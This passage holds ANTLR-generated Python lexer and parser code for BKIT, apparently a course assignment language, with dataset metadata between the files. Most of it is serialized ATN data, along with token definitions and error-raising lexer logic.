buf.write(\"L\\3\\2\\2\\2\\u00ed\\u00f2\\5\\3\\2\\2\\u00ee\\u00f1\\5\\3\\2\\2\\u00ef\")\n buf.write(\"\\u00f1\\5\\7\\4\\2\\u00f0\\u00ee\\3\\2\\2\\2\\u00f0\\u00ef\\3\\2\\2\\2\")\n buf.write(\"\\u00f1\\u00f4\\3\\2\\2\\2\\u00f2\\u00f0\\3\\2\\2\\2\\u00f2\\u00f3\\3\")\n buf.write(\"\\2\\2\\2\\u00f3N\\3\\2\\2\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f5\\u00f9\")\n buf.write(\"\\7$\\2\\2\\u00f6\\u00f8\\5\\27\\f\\2\\u00f7\\u00f6\\3\\2\\2\\2\\u00f8\")\n buf.write(\"\\u00fb\\3\\2\\2\\2\\u00f9\\u00f7\\3\\2\\2\\2\\u00f9\\u00fa\\3\\2\\2\\2\")\n buf.write(\"\\u00fa\\u00fc\\3\\2\\2\\2\\u00fb\\u00f9\\3\\2\\2\\2\\u00fc\\u00fd\\5\")\n buf.write(\"\\21\\t\\2\\u00fdP\\3\\2\\2\\2\\u00fe\\u0102\\7$\\2\\2\\u00ff\\u0101\")\n buf.write(\"\\5\\27\\f\\2\\u0100\\u00ff\\3\\2\\2\\2\\u0101\\u0104\\3\\2\\2\\2\\u0102\")\n buf.write(\"\\u0100\\3\\2\\2\\2\\u0102\\u0103\\3\\2\\2\\2\\u0103\\u0105\\3\\2\\2\\2\")\n buf.write(\"\\u0104\\u0102\\3\\2\\2\\2\\u0105\\u0106\\7\\2\\2\\3\\u0106R\\3\\2\\2\")\n buf.write(\"\\2\\u0107\\u0108\\7,\\2\\2\\u0108\\u0109\\7,\\2\\2\\u0109\\u010d\\3\")\n buf.write(\"\\2\\2\\2\\u010a\\u010c\\13\\2\\2\\2\\u010b\\u010a\\3\\2\\2\\2\\u010c\")\n buf.write(\"\\u010f\\3\\2\\2\\2\\u010d\\u010e\\3\\2\\2\\2\\u010d\\u010b\\3\\2\\2\\2\")\n buf.write(\"\\u010e\\u0110\\3\\2\\2\\2\\u010f\\u010d\\3\\2\\2\\2\\u0110\\u0111\\7\")\n buf.write(\",\\2\\2\\u0111\\u0112\\7,\\2\\2\\u0112\\u0113\\3\\2\\2\\2\\u0113\\u0114\")\n buf.write(\"\\b*\\2\\2\\u0114T\\3\\2\\2\\2\\u0115\\u0116\\7,\\2\\2\\u0116\\u0117\")\n buf.write(\"\\7,\\2\\2\\u0117\\u011b\\3\\2\\2\\2\\u0118\\u011a\\13\\2\\2\\2\\u0119\")\n buf.write(\"\\u0118\\3\\2\\2\\2\\u011a\\u011d\\3\\2\\2\\2\\u011b\\u011c\\3\\2\\2\\2\")\n buf.write(\"\\u011b\\u0119\\3\\2\\2\\2\\u011c\\u011e\\3\\2\\2\\2\\u011d\\u011b\\3\")\n buf.write(\"\\2\\2\\2\\u011e\\u011f\\7\\2\\2\\3\\u011fV\\3\\2\\2\\2\\u0120\\u0121\")\n buf.write(\"\\t\\13\\2\\2\\u0121X\\3\\2\\2\\2\\u0122\\u0124\\t\\f\\2\\2\\u0123\\u0122\")\n buf.write(\"\\3\\2\\2\\2\\u0124\\u0125\\3\\2\\2\\2\\u0125\\u0123\\3\\2\\2\\2\\u0125\")\n buf.write(\"\\u0126\\3\\2\\2\\2\\u0126\\u0127\\3\\2\\2\\2\\u0127\\u0128\\b-\\2\\2\")\n buf.write(\"\\u0128Z\\3\\2\\2\\2\\31\\2cglrx|\\177\\u008d\\u0097\\u009c\\u00a1\")\n buf.write(\"\\u00a7\\u00ac\\u00b1\\u00b9\\u00f0\\u00f2\\u00f9\\u0102\\u010d\")\n buf.write(\"\\u011b\\u0125\\3\\b\\2\\2\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n Integer_literal = 1\n Float_literal = 2\n String_literal = 3\n RETURN = 4\n INT = 5\n FLOAT = 6\n PLUS_INT = 7\n MINUS_INT = 8\n STAR_INT = 9\n DIV_INT = 10\n LEFT_PAREN = 11\n RIGHT_PAREN = 12\n LEFT_BRACKET = 13\n RIGHT_BRACKET = 14\n LEFT_BRACE = 15\n RIGHT_BRACE = 16\n COLON = 17\n DOT = 18\n SEMI = 19\n COMMA = 20\n ASSIGN = 21\n ID = 22\n ILLEGAL_ESCAPE = 23\n UNCLOSE_STRING = 24\n COMMENT = 25\n UNTERMINATED_COMMENT = 26\n ERROR_CHAR = 27\n WS = 28\n\n channelNames = [ u\"DEFAULT_TOKEN_CHANNEL\", u\"HIDDEN\" ]\n\n modeNames = [ \"DEFAULT_MODE\" ]\n\n literalNames = [ \"<INVALID>\",\n \"'+'\", \"'-'\", \"'*'\", \"'/'\", \"'('\", \"')'\", \"'['\", \"']'\", \"'{'\", \n \"'}'\", \"':'\", \"'.'\", \"';'\", \"','\", \"'='\" ]\n\n symbolicNames = [ \"<INVALID>\",\n \"Integer_literal\", \"Float_literal\", \"String_literal\", \"RETURN\", \n \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \"STAR_INT\", \"DIV_INT\", \n \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \"RIGHT_BRACKET\", \n \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \"DOT\", \"SEMI\", \"COMMA\", \n \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \"UNCLOSE_STRING\", \"COMMENT\", \n \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \"WS\" ]\n\n ruleNames = [ \"LOWERCASE_LETTER\", \"UPPERCASE_LETTER\", \"DIGIT\", \"LETTER\", \n \"SCIENTIFIC\", \"DECIMAL_POINT\", \"FLOATING_POINT_NUM\", \"ILL_ESC_SEQUENCE\", \n \"SUP_ESC_SEQUENCE\", \"DOUBLE_QUOTE_IN_STRING\", \"STRING_CHAR\", \n \"HEXADECIMALDIGIT\", \"OCTALDIGIT\", \"HEXADECIMAL\", \"DECIMAL\", \n \"OCTAL\", \"Integer_literal\", \"Float_literal\", \"String_literal\", \n \"RETURN\", \"INT\", \"FLOAT\", \"PLUS_INT\", \"MINUS_INT\", \"STAR_INT\", \n \"DIV_INT\", \"LEFT_PAREN\", \"RIGHT_PAREN\", \"LEFT_BRACKET\", \n \"RIGHT_BRACKET\", \"LEFT_BRACE\", \"RIGHT_BRACE\", \"COLON\", \n \"DOT\", \"SEMI\", \"COMMA\", \"ASSIGN\", \"ID\", \"ILLEGAL_ESCAPE\", \n \"UNCLOSE_STRING\", \"COMMENT\", \"UNTERMINATED_COMMENT\", \"ERROR_CHAR\", \n \"WS\" ]\n\n grammarFileName = \"BKIT.g4\"\n\n def __init__(self, input=None, output:TextIO = sys.stdout):\n super().__init__(input, output)\n self.checkVersion(\"4.8\")\n self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())\n self._actions = None\n self._predicates = None\n\n\n def emit(self):\n tk = self.type\n result = super().emit()\n if tk == self.UNCLOSE_STRING: \n raise UncloseString(result.text)\n elif tk == self.ILLEGAL_ESCAPE:\n raise IllegalEscape(result.text)\n elif tk == self.ERROR_CHAR:\n raise ErrorToken(result.text)\n elif tk == self.UNTERMINATED_COMMENT:\n raise UnterminatedComment()\n else:\n return result;\n\n\n" }, { "alpha_fraction": 0.49371516704559326, "alphanum_fraction": 0.5526729822158813, "avg_line_length": 33.85365295410156, "blob_id": "aac05ec2db0f1d71dd4133f3db35ec1635919bae", "content_id": "ec82632fd474801b7fa52df2dfb700c01cd369e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 116948, "license_type": "no_license", "max_line_length": 455, "num_lines": 3355, "path": "/Assignments/assignment1/target/main/bkit/parser/BKITParser.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from main/bkit/parser/BKIT.g4 by ANTLR 4.8\n# encoding: utf-8\nfrom antlr4 import *\nfrom io import StringIO\nimport sys\nif sys.version_info[1] > 5:\n\tfrom typing import TextIO\nelse:\n\tfrom typing.io import TextIO\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\3M\")\n buf.write(\"\\u01ba\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\\t\\7\")\n buf.write(\"\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\\4\\16\")\n buf.write(\"\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\\t\\23\")\n buf.write(\"\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\\4\\31\")\n buf.write(\"\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\\t\\36\")\n buf.write(\"\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\\4&\\t\")\n buf.write(\"&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\3\\2\\3\\2\\3\\2\\7\\2Z\\n\\2\")\n buf.write(\"\\f\\2\\16\\2]\\13\\2\\3\\2\\7\\2`\\n\\2\\f\\2\\16\\2c\\13\\2\\3\\2\\3\\2\\3\")\n buf.write(\"\\3\\3\\3\\3\\3\\3\\3\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\3\\4\\5\\4q\\n\\4\\3\\4\\3\")\n buf.write(\"\\4\\3\\4\\3\\4\\3\\4\\7\\4x\\n\\4\\f\\4\\16\\4{\\13\\4\\3\\4\\7\\4~\\n\\4\\f\")\n buf.write(\"\\4\\16\\4\\u0081\\13\\4\\3\\4\\3\\4\\3\\4\\3\\5\\3\\5\\3\\5\\3\\5\\3\\6\\3\\6\")\n buf.write(\"\\3\\7\\3\\7\\3\\b\\3\\b\\3\\b\\5\\b\\u0091\\n\\b\\3\\b\\3\\b\\3\\b\\5\\b\\u0096\")\n buf.write(\"\\n\\b\\7\\b\\u0098\\n\\b\\f\\b\\16\\b\\u009b\\13\\b\\5\\b\\u009d\\n\\b\\3\")\n buf.write(\"\\b\\3\\b\\3\\t\\3\\t\\5\\t\\u00a3\\n\\t\\3\\t\\3\\t\\3\\t\\5\\t\\u00a8\\n\\t\")\n buf.write(\"\\7\\t\\u00aa\\n\\t\\f\\t\\16\\t\\u00ad\\13\\t\\3\\n\\3\\n\\3\\13\\3\\13\\3\")\n buf.write(\"\\13\\3\\13\\6\\13\\u00b5\\n\\13\\r\\13\\16\\13\\u00b6\\3\\13\\5\\13\\u00ba\")\n buf.write(\"\\n\\13\\3\\f\\3\\f\\3\\f\\3\\f\\5\\f\\u00c0\\n\\f\\3\\f\\3\\f\\6\\f\\u00c4\")\n buf.write(\"\\n\\f\\r\\f\\16\\f\\u00c5\\3\\r\\3\\r\\3\\r\\3\\r\\6\\r\\u00cc\\n\\r\\r\\r\")\n buf.write(\"\\16\\r\\u00cd\\3\\r\\5\\r\\u00d1\\n\\r\\3\\r\\3\\r\\3\\r\\5\\r\\u00d6\\n\")\n buf.write(\"\\r\\3\\16\\3\\16\\3\\16\\3\\16\\3\\17\\3\\17\\3\\17\\3\\17\\3\\20\\3\\20\\3\")\n buf.write(\"\\20\\7\\20\\u00e3\\n\\20\\f\\20\\16\\20\\u00e6\\13\\20\\3\\21\\3\\21\\3\")\n buf.write(\"\\21\\7\\21\\u00eb\\n\\21\\f\\21\\16\\21\\u00ee\\13\\21\\3\\21\\7\\21\\u00f1\")\n buf.write(\"\\n\\21\\f\\21\\16\\21\\u00f4\\13\\21\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\\3\\22\")\n buf.write(\"\\3\\22\\3\\22\\3\\22\\5\\22\\u0109\\n\\22\\3\\23\\3\\23\\3\\23\\3\\23\\3\")\n buf.write(\"\\23\\3\\23\\3\\23\\3\\23\\3\\23\\7\\23\\u0114\\n\\23\\f\\23\\16\\23\\u0117\")\n buf.write(\"\\13\\23\\3\\23\\3\\23\\5\\23\\u011b\\n\\23\\3\\23\\3\\23\\3\\23\\3\\24\\3\")\n buf.write(\"\\24\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\\3\\25\")\n buf.write(\"\\3\\25\\3\\25\\3\\25\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\26\\3\\27\")\n buf.write(\"\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\27\\3\\30\\3\\30\\5\\30\\u013f\\n\")\n buf.write(\"\\30\\3\\30\\3\\30\\3\\30\\3\\31\\3\\31\\3\\32\\3\\32\\3\\33\\3\\33\\3\\34\")\n buf.write(\"\\3\\34\\5\\34\\u014c\\n\\34\\3\\35\\3\\35\\3\\35\\3\\35\\3\\36\\3\\36\\3\")\n buf.write(\"\\37\\3\\37\\3 \\3 \\3 \\3 \\3 \\5 \\u015b\\n \\3!\\3!\\3!\\3!\\3!\\3!\")\n buf.write(\"\\7!\\u0163\\n!\\f!\\16!\\u0166\\13!\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\\3\\\"\")\n buf.write(\"\\7\\\"\\u016e\\n\\\"\\f\\\"\\16\\\"\\u0171\\13\\\"\\3#\\3#\\3#\\3#\\3#\\3#\\7\")\n buf.write(\"#\\u0179\\n#\\f#\\16#\\u017c\\13#\\3$\\3$\\3$\\5$\\u0181\\n$\\3%\\3\")\n buf.write(\"%\\3%\\5%\\u0186\\n%\\3&\\3&\\3&\\3&\\5&\\u018c\\n&\\3\\'\\3\\'\\5\\'\\u0190\")\n buf.write(\"\\n\\'\\3(\\3(\\3(\\3(\\3(\\5(\\u0197\\n(\\3)\\3)\\3)\\5)\\u019c\\n)\\3\")\n buf.write(\"*\\3*\\3*\\3*\\3*\\7*\\u01a3\\n*\\f*\\16*\\u01a6\\13*\\7*\\u01a8\\n\")\n buf.write(\"*\\f*\\16*\\u01ab\\13*\\3*\\3*\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\3+\\5\")\n buf.write(\"+\\u01b8\\n+\\3+\\2\\5@BD,\\2\\4\\6\\b\\n\\f\\16\\20\\22\\24\\26\\30\\32\")\n buf.write(\"\\34\\36 \\\"$&(*,.\\60\\62\\64\\668:<>@BDFHJLNPRT\\2\\b\\3\\2\\4\\7\")\n buf.write(\"\\3\\2)\\63\\3\\2\\'(\\3\\2\\35 \\3\\2!%\\3\\2\\37 \\2\\u01bf\\2[\\3\\2\\2\")\n buf.write(\"\\2\\4f\\3\\2\\2\\2\\6j\\3\\2\\2\\2\\b\\u0085\\3\\2\\2\\2\\n\\u0089\\3\\2\\2\")\n buf.write(\"\\2\\f\\u008b\\3\\2\\2\\2\\16\\u008d\\3\\2\\2\\2\\20\\u00a2\\3\\2\\2\\2\\22\")\n buf.write(\"\\u00ae\\3\\2\\2\\2\\24\\u00b9\\3\\2\\2\\2\\26\\u00bb\\3\\2\\2\\2\\30\\u00d0\")\n buf.write(\"\\3\\2\\2\\2\\32\\u00d7\\3\\2\\2\\2\\34\\u00db\\3\\2\\2\\2\\36\\u00df\\3\")\n buf.write(\"\\2\\2\\2 \\u00ec\\3\\2\\2\\2\\\"\\u0108\\3\\2\\2\\2$\\u010a\\3\\2\\2\\2&\")\n buf.write(\"\\u011f\\3\\2\\2\\2(\\u0121\\3\\2\\2\\2*\\u012e\\3\\2\\2\\2,\\u0135\\3\")\n buf.write(\"\\2\\2\\2.\\u013e\\3\\2\\2\\2\\60\\u0143\\3\\2\\2\\2\\62\\u0145\\3\\2\\2\")\n buf.write(\"\\2\\64\\u0147\\3\\2\\2\\2\\66\\u0149\\3\\2\\2\\28\\u014d\\3\\2\\2\\2:\\u0151\")\n buf.write(\"\\3\\2\\2\\2<\\u0153\\3\\2\\2\\2>\\u015a\\3\\2\\2\\2@\\u015c\\3\\2\\2\\2\")\n buf.write(\"B\\u0167\\3\\2\\2\\2D\\u0172\\3\\2\\2\\2F\\u0180\\3\\2\\2\\2H\\u0185\\3\")\n buf.write(\"\\2\\2\\2J\\u018b\\3\\2\\2\\2L\\u018f\\3\\2\\2\\2N\\u0196\\3\\2\\2\\2P\\u019b\")\n buf.write(\"\\3\\2\\2\\2R\\u019d\\3\\2\\2\\2T\\u01b7\\3\\2\\2\\2VW\\5\\4\\3\\2WX\\7<\")\n buf.write(\"\\2\\2XZ\\3\\2\\2\\2YV\\3\\2\\2\\2Z]\\3\\2\\2\\2[Y\\3\\2\\2\\2[\\\\\\3\\2\\2\")\n buf.write(\"\\2\\\\a\\3\\2\\2\\2][\\3\\2\\2\\2^`\\5\\6\\4\\2_^\\3\\2\\2\\2`c\\3\\2\\2\\2\")\n buf.write(\"a_\\3\\2\\2\\2ab\\3\\2\\2\\2bd\\3\\2\\2\\2ca\\3\\2\\2\\2de\\7\\2\\2\\3e\\3\")\n buf.write(\"\\3\\2\\2\\2fg\\7\\30\\2\\2gh\\7:\\2\\2hi\\5\\20\\t\\2i\\5\\3\\2\\2\\2jk\\7\")\n buf.write(\"\\23\\2\\2kl\\7:\\2\\2lp\\7\\3\\2\\2mn\\7\\25\\2\\2no\\7:\\2\\2oq\\5\\36\")\n buf.write(\"\\20\\2pm\\3\\2\\2\\2pq\\3\\2\\2\\2qr\\3\\2\\2\\2rs\\7\\b\\2\\2sy\\7:\\2\\2\")\n buf.write(\"tu\\5&\\24\\2uv\\7<\\2\\2vx\\3\\2\\2\\2wt\\3\\2\\2\\2x{\\3\\2\\2\\2yw\\3\")\n buf.write(\"\\2\\2\\2yz\\3\\2\\2\\2z\\177\\3\\2\\2\\2{y\\3\\2\\2\\2|~\\5\\\"\\22\\2}|\\3\")\n buf.write(\"\\2\\2\\2~\\u0081\\3\\2\\2\\2\\177}\\3\\2\\2\\2\\177\\u0080\\3\\2\\2\\2\\u0080\")\n buf.write(\"\\u0082\\3\\2\\2\\2\\u0081\\177\\3\\2\\2\\2\\u0082\\u0083\\7\\17\\2\\2\")\n buf.write(\"\\u0083\\u0084\\7;\\2\\2\\u0084\\7\\3\\2\\2\\2\\u0085\\u0086\\7\\3\\2\")\n buf.write(\"\\2\\u0086\\u0087\\7>\\2\\2\\u0087\\u0088\\5\\16\\b\\2\\u0088\\t\\3\\2\")\n buf.write(\"\\2\\2\\u0089\\u008a\\t\\2\\2\\2\\u008a\\13\\3\\2\\2\\2\\u008b\\u008c\")\n buf.write(\"\\5\\16\\b\\2\\u008c\\r\\3\\2\\2\\2\\u008d\\u009c\\78\\2\\2\\u008e\\u0091\")\n buf.write(\"\\5\\n\\6\\2\\u008f\\u0091\\5\\f\\7\\2\\u0090\\u008e\\3\\2\\2\\2\\u0090\")\n buf.write(\"\\u008f\\3\\2\\2\\2\\u0091\\u0099\\3\\2\\2\\2\\u0092\\u0095\\7=\\2\\2\")\n buf.write(\"\\u0093\\u0096\\5\\n\\6\\2\\u0094\\u0096\\5\\f\\7\\2\\u0095\\u0093\\3\")\n buf.write(\"\\2\\2\\2\\u0095\\u0094\\3\\2\\2\\2\\u0096\\u0098\\3\\2\\2\\2\\u0097\\u0092\")\n buf.write(\"\\3\\2\\2\\2\\u0098\\u009b\\3\\2\\2\\2\\u0099\\u0097\\3\\2\\2\\2\\u0099\")\n buf.write(\"\\u009a\\3\\2\\2\\2\\u009a\\u009d\\3\\2\\2\\2\\u009b\\u0099\\3\\2\\2\\2\")\n buf.write(\"\\u009c\\u0090\\3\\2\\2\\2\\u009c\\u009d\\3\\2\\2\\2\\u009d\\u009e\\3\")\n buf.write(\"\\2\\2\\2\\u009e\\u009f\\79\\2\\2\\u009f\\17\\3\\2\\2\\2\\u00a0\\u00a3\")\n buf.write(\"\\5\\24\\13\\2\\u00a1\\u00a3\\5\\30\\r\\2\\u00a2\\u00a0\\3\\2\\2\\2\\u00a2\")\n buf.write(\"\\u00a1\\3\\2\\2\\2\\u00a3\\u00ab\\3\\2\\2\\2\\u00a4\\u00a7\\7=\\2\\2\")\n buf.write(\"\\u00a5\\u00a8\\5\\24\\13\\2\\u00a6\\u00a8\\5\\30\\r\\2\\u00a7\\u00a5\")\n buf.write(\"\\3\\2\\2\\2\\u00a7\\u00a6\\3\\2\\2\\2\\u00a8\\u00aa\\3\\2\\2\\2\\u00a9\")\n buf.write(\"\\u00a4\\3\\2\\2\\2\\u00aa\\u00ad\\3\\2\\2\\2\\u00ab\\u00a9\\3\\2\\2\\2\")\n buf.write(\"\\u00ab\\u00ac\\3\\2\\2\\2\\u00ac\\21\\3\\2\\2\\2\\u00ad\\u00ab\\3\\2\")\n buf.write(\"\\2\\2\\u00ae\\u00af\\7\\3\\2\\2\\u00af\\23\\3\\2\\2\\2\\u00b0\\u00b4\")\n buf.write(\"\\7\\3\\2\\2\\u00b1\\u00b2\\7\\66\\2\\2\\u00b2\\u00b3\\7\\4\\2\\2\\u00b3\")\n buf.write(\"\\u00b5\\7\\67\\2\\2\\u00b4\\u00b1\\3\\2\\2\\2\\u00b5\\u00b6\\3\\2\\2\")\n buf.write(\"\\2\\u00b6\\u00b4\\3\\2\\2\\2\\u00b6\\u00b7\\3\\2\\2\\2\\u00b7\\u00ba\")\n buf.write(\"\\3\\2\\2\\2\\u00b8\\u00ba\\7\\3\\2\\2\\u00b9\\u00b0\\3\\2\\2\\2\\u00b9\")\n buf.write(\"\\u00b8\\3\\2\\2\\2\\u00ba\\25\\3\\2\\2\\2\\u00bb\\u00c3\\7\\3\\2\\2\\u00bc\")\n buf.write(\"\\u00bf\\7\\66\\2\\2\\u00bd\\u00c0\\5\\26\\f\\2\\u00be\\u00c0\\5> \\2\")\n buf.write(\"\\u00bf\\u00bd\\3\\2\\2\\2\\u00bf\\u00be\\3\\2\\2\\2\\u00c0\\u00c1\\3\")\n buf.write(\"\\2\\2\\2\\u00c1\\u00c2\\7\\67\\2\\2\\u00c2\\u00c4\\3\\2\\2\\2\\u00c3\")\n buf.write(\"\\u00bc\\3\\2\\2\\2\\u00c4\\u00c5\\3\\2\\2\\2\\u00c5\\u00c3\\3\\2\\2\\2\")\n buf.write(\"\\u00c5\\u00c6\\3\\2\\2\\2\\u00c6\\27\\3\\2\\2\\2\\u00c7\\u00cb\\7\\3\")\n buf.write(\"\\2\\2\\u00c8\\u00c9\\7\\66\\2\\2\\u00c9\\u00ca\\7\\4\\2\\2\\u00ca\\u00cc\")\n buf.write(\"\\7\\67\\2\\2\\u00cb\\u00c8\\3\\2\\2\\2\\u00cc\\u00cd\\3\\2\\2\\2\\u00cd\")\n buf.write(\"\\u00cb\\3\\2\\2\\2\\u00cd\\u00ce\\3\\2\\2\\2\\u00ce\\u00d1\\3\\2\\2\\2\")\n buf.write(\"\\u00cf\\u00d1\\5\\22\\n\\2\\u00d0\\u00c7\\3\\2\\2\\2\\u00d0\\u00cf\")\n buf.write(\"\\3\\2\\2\\2\\u00d1\\u00d2\\3\\2\\2\\2\\u00d2\\u00d5\\7>\\2\\2\\u00d3\")\n buf.write(\"\\u00d6\\5\\f\\7\\2\\u00d4\\u00d6\\5\\n\\6\\2\\u00d5\\u00d3\\3\\2\\2\\2\")\n buf.write(\"\\u00d5\\u00d4\\3\\2\\2\\2\\u00d6\\31\\3\\2\\2\\2\\u00d7\\u00d8\\5\\26\")\n buf.write(\"\\f\\2\\u00d8\\u00d9\\7>\\2\\2\\u00d9\\u00da\\5\\16\\b\\2\\u00da\\33\")\n buf.write(\"\\3\\2\\2\\2\\u00db\\u00dc\\5\\22\\n\\2\\u00dc\\u00dd\\7>\\2\\2\\u00dd\")\n buf.write(\"\\u00de\\5\\n\\6\\2\\u00de\\35\\3\\2\\2\\2\\u00df\\u00e4\\5\\24\\13\\2\")\n buf.write(\"\\u00e0\\u00e1\\7=\\2\\2\\u00e1\\u00e3\\5\\24\\13\\2\\u00e2\\u00e0\")\n buf.write(\"\\3\\2\\2\\2\\u00e3\\u00e6\\3\\2\\2\\2\\u00e4\\u00e2\\3\\2\\2\\2\\u00e4\")\n buf.write(\"\\u00e5\\3\\2\\2\\2\\u00e5\\37\\3\\2\\2\\2\\u00e6\\u00e4\\3\\2\\2\\2\\u00e7\")\n buf.write(\"\\u00e8\\5&\\24\\2\\u00e8\\u00e9\\7<\\2\\2\\u00e9\\u00eb\\3\\2\\2\\2\")\n buf.write(\"\\u00ea\\u00e7\\3\\2\\2\\2\\u00eb\\u00ee\\3\\2\\2\\2\\u00ec\\u00ea\\3\")\n buf.write(\"\\2\\2\\2\\u00ec\\u00ed\\3\\2\\2\\2\\u00ed\\u00f2\\3\\2\\2\\2\\u00ee\\u00ec\")\n buf.write(\"\\3\\2\\2\\2\\u00ef\\u00f1\\5\\\"\\22\\2\\u00f0\\u00ef\\3\\2\\2\\2\\u00f1\")\n buf.write(\"\\u00f4\\3\\2\\2\\2\\u00f2\\u00f0\\3\\2\\2\\2\\u00f2\\u00f3\\3\\2\\2\\2\")\n buf.write(\"\\u00f3!\\3\\2\\2\\2\\u00f4\\u00f2\\3\\2\\2\\2\\u00f5\\u0109\\5$\\23\")\n buf.write(\"\\2\\u00f6\\u0109\\5(\\25\\2\\u00f7\\u0109\\5*\\26\\2\\u00f8\\u0109\")\n buf.write(\"\\5,\\27\\2\\u00f9\\u00fa\\5.\\30\\2\\u00fa\\u00fb\\7<\\2\\2\\u00fb\")\n buf.write(\"\\u0109\\3\\2\\2\\2\\u00fc\\u00fd\\5\\60\\31\\2\\u00fd\\u00fe\\7<\\2\")\n buf.write(\"\\2\\u00fe\\u0109\\3\\2\\2\\2\\u00ff\\u0100\\5\\62\\32\\2\\u0100\\u0101\")\n buf.write(\"\\7<\\2\\2\\u0101\\u0109\\3\\2\\2\\2\\u0102\\u0103\\5\\64\\33\\2\\u0103\")\n buf.write(\"\\u0104\\7<\\2\\2\\u0104\\u0109\\3\\2\\2\\2\\u0105\\u0106\\5\\66\\34\")\n buf.write(\"\\2\\u0106\\u0107\\7<\\2\\2\\u0107\\u0109\\3\\2\\2\\2\\u0108\\u00f5\")\n buf.write(\"\\3\\2\\2\\2\\u0108\\u00f6\\3\\2\\2\\2\\u0108\\u00f7\\3\\2\\2\\2\\u0108\")\n buf.write(\"\\u00f8\\3\\2\\2\\2\\u0108\\u00f9\\3\\2\\2\\2\\u0108\\u00fc\\3\\2\\2\\2\")\n buf.write(\"\\u0108\\u00ff\\3\\2\\2\\2\\u0108\\u0102\\3\\2\\2\\2\\u0108\\u0105\\3\")\n buf.write(\"\\2\\2\\2\\u0109#\\3\\2\\2\\2\\u010a\\u010b\\7\\24\\2\\2\\u010b\\u010c\")\n buf.write(\"\\5> \\2\\u010c\\u010d\\7\\27\\2\\2\\u010d\\u0115\\5 \\21\\2\\u010e\")\n buf.write(\"\\u010f\\7\\r\\2\\2\\u010f\\u0110\\5> \\2\\u0110\\u0111\\7\\27\\2\\2\")\n buf.write(\"\\u0111\\u0112\\5 \\21\\2\\u0112\\u0114\\3\\2\\2\\2\\u0113\\u010e\\3\")\n buf.write(\"\\2\\2\\2\\u0114\\u0117\\3\\2\\2\\2\\u0115\\u0113\\3\\2\\2\\2\\u0115\\u0116\")\n buf.write(\"\\3\\2\\2\\2\\u0116\\u011a\\3\\2\\2\\2\\u0117\\u0115\\3\\2\\2\\2\\u0118\")\n buf.write(\"\\u0119\\7\\f\\2\\2\\u0119\\u011b\\5 \\21\\2\\u011a\\u0118\\3\\2\\2\\2\")\n buf.write(\"\\u011a\\u011b\\3\\2\\2\\2\\u011b\\u011c\\3\\2\\2\\2\\u011c\\u011d\\7\")\n buf.write(\"\\16\\2\\2\\u011d\\u011e\\7;\\2\\2\\u011e%\\3\\2\\2\\2\\u011f\\u0120\")\n buf.write(\"\\5\\4\\3\\2\\u0120\\'\\3\\2\\2\\2\\u0121\\u0122\\7\\22\\2\\2\\u0122\\u0123\")\n buf.write(\"\\7\\64\\2\\2\\u0123\\u0124\\58\\35\\2\\u0124\\u0125\\7=\\2\\2\\u0125\")\n buf.write(\"\\u0126\\5:\\36\\2\\u0126\\u0127\\7=\\2\\2\\u0127\\u0128\\5<\\37\\2\")\n buf.write(\"\\u0128\\u0129\\7\\65\\2\\2\\u0129\\u012a\\7\\13\\2\\2\\u012a\\u012b\")\n buf.write(\"\\5 \\21\\2\\u012b\\u012c\\7\\20\\2\\2\\u012c\\u012d\\7;\\2\\2\\u012d\")\n buf.write(\")\\3\\2\\2\\2\\u012e\\u012f\\7\\31\\2\\2\\u012f\\u0130\\5> \\2\\u0130\")\n buf.write(\"\\u0131\\7\\13\\2\\2\\u0131\\u0132\\5 \\21\\2\\u0132\\u0133\\7\\21\\2\")\n buf.write(\"\\2\\u0133\\u0134\\7;\\2\\2\\u0134+\\3\\2\\2\\2\\u0135\\u0136\\7\\13\")\n buf.write(\"\\2\\2\\u0136\\u0137\\5 \\21\\2\\u0137\\u0138\\7\\31\\2\\2\\u0138\\u0139\")\n buf.write(\"\\5> \\2\\u0139\\u013a\\7\\34\\2\\2\\u013a\\u013b\\7;\\2\\2\\u013b-\")\n buf.write(\"\\3\\2\\2\\2\\u013c\\u013f\\5\\26\\f\\2\\u013d\\u013f\\5\\22\\n\\2\\u013e\")\n 